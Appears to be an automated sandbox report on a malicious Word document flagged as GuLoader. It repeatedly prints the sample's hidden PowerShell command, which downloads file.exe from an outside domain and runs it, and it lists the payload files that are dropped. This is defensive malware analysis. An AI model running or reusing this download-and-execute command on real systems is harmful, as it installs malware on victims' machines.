Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scTJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Users\user\AppData\Roaming\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
Source: TEPO0015922.LNK.0.drLNK file: ..\..\..\..\..\Desktop\TEPO0015922.doc
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_004033B3
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,16_2_004033B3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO0015922.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR63F0.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@29/33@2/1
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00402173 CoCreateInstance,MultiByteToWideChar,9_2_00402173
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,9_2_00404766
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: tomation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb1. source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb8t source: powershell.exe, 00000012.00000002.958909440.0000000002D54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B54000.00000004.00000020.00020000.00000000.sdmp
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Yara detected GuLoader
Source: Yara matchFile source: 00000009.00000002.1283953918.0000000006770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: libgdk_pixbuf-2.0-0.dll.9.drStatic PE information: section name: .xdata
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_73C22288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,9_2_73C22288

Persistence and Installation Behavior

barindex
Tries to download and execute files (via powershell)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Local\Temp\nss4AE7.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\file.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\License.rtfJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
